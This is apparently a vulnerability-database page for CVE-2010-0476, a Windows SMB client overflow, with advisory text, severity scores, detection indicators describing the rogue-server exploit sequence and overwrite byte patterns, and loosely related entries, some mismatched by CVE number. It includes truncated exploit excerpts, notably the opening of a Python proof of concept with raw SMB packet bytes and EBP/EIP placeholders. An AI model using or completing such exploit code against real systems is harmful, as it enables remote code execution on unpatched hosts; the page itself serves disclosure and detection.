CVE-2010-0476
published 2010-04-14CVE-2010-0476: The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and…
PriorityP263critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
34.33%
98.2th percentile
The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
commandSMB Trans2 QUERY_FS_INFO response with oversized/malformed parameter block triggering stack overflow↗
bytes↗
FF 53 4D 42 72 (SMBv1 Negotiate Protocol Request/Response magic)
bytes↗
FF 53 4D 42 32 (SMBv1 Trans2 command 0x32 malicious response packet)
- →A rogue SMB server (or MitM) responds to SMB client Negotiate (0x72), SessionSetup (0x73), TreeConnect (0x75), NTCreate (0xa2), and Trans2 (0x32) in sequence; the malicious Trans2 QUERY_FS_INFO response triggers the overflow — detect an inbound SMB server response on port 445 containing SMB command byte 0x32 with anomalous parameter/data lengths. ↗
- →The exploit operates as a rogue SMB server listening on TCP/445; monitor for unexpected hosts acting as SMB servers (i.e., sending SMB responses rather than requests) on port 445, especially in client-to-server traffic flows. ↗
- →The crafted Trans2 response packet (packetrans) contains the byte sequence 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 followed by 02 61 and repeated 0x42/0x41 bytes (EBP/EIP overwrite pattern); this padding pattern in an SMB Trans2 response body is a strong indicator of exploitation. ↗
- →The vulnerability affects SMBv1 and SMBv2 client response parsing; block or alert on outbound SMB client connections (TCP/445) to untrusted external hosts, as exploitation requires the Windows SMB client to connect to an attacker-controlled server. ↗
- ·The PoC was tested only on Windows 7 and Windows Server 2008 R2, while CVE-2010-0476 per NVD also affects Windows Server 2003 SP2, Vista Gold/SP1/SP2, and Server 2008 Gold/SP2; EBP/EIP offsets and shellcode would need adjustment per target OS/SP. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.4HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9mq3-v894-gjm6: The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-
ghsa_unreviewed·2022-05-02
CVE-2010-0476 [HIGH] GHSA-9mq3-v894-gjm6: The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-
The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability."
Red Hat
libspice: Insufficient guest provided memory mappings boundaries validations
vendor_redhat·2010-03-30·CVSS 7.4
CVE-2010-0430 [HIGH] libspice: Insufficient guest provided memory mappings boundaries validations
libspice: Insufficient guest provided memory mappings boundaries validations
libspice, as used in QEMU-KVM in Red Hat Enterprise Virtualization Hypervisor (aka RHEV-H or rhev-hypervisor) before 5.5-2.2 and possibly other products, allows guest OS users to read from or write to arbitrary QEMU memory by modifying the address that is used by Cairo for memory mappings.
Statement: The CVE-2010-0430 issue was fixed in the kvm packages for Red Hat Enterprise Linux 5 via RHSA-2010:0271, and fixed in the rhev-hypervisor package via RHSA-2010:0476. This CVE was not disclosed at the time the errata were released; therefore, it was not mentioned in them.
No detection rules found.
Exploit-DB
Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-0476 Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
---
##
# $Id: winamp_playlist_unc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Winamp Playlist UNC Path Computer Name Overflow',
'Description' => %q{
This module exploits a vulnerability in the Winamp media player.
This flaw is triggered when a audio file path is specified, inside a
playlist, that consists of a UNC path with a long computer name. This
module delivers the playlist via the browser. This module has only
been successfully test
Exploit-DB
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
exploitdb·2010-04-17·CVSS 9.0
CVE-2010-0477 [CRITICAL] Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
---
import sys,SocketServer
# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html
#
# Note from Exploit-DB: It has been reported to us that CVE-2010-0020 also applies
#
EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"
packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xf
Exploit-DB
Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
exploitdb·2010-01-28
CVE-2009-0476 Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
Audiotran 1.4.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: audiotran_pls.rb 8306 2010-01-28 21:04:01Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audi
Exploit-DB
Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
exploitdb·2010-01-10
CVE-2009-0476 Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Local Buffer Overflow
---
#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date : January 9th, 2010
# Author : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version : 1.4.1
# OS : Windows
# Tested on : XP SP2/SP3 En (VMware)
# Type of vuln : Stack Overflow / SEH
# Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
banner =
"|------------------------------------------------------------------|\n" +
"| __ __ |\n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"|
http://secunia.com/advisories/39372http://www.securityfocus.com/bid/39336http://www.us-cert.gov/cas/techalerts/TA10-103A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-020https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6918http://secunia.com/advisories/39372http://www.securityfocus.com/bid/39336http://www.us-cert.gov/cas/techalerts/TA10-103A.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-020https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6918
2010-04-14
Published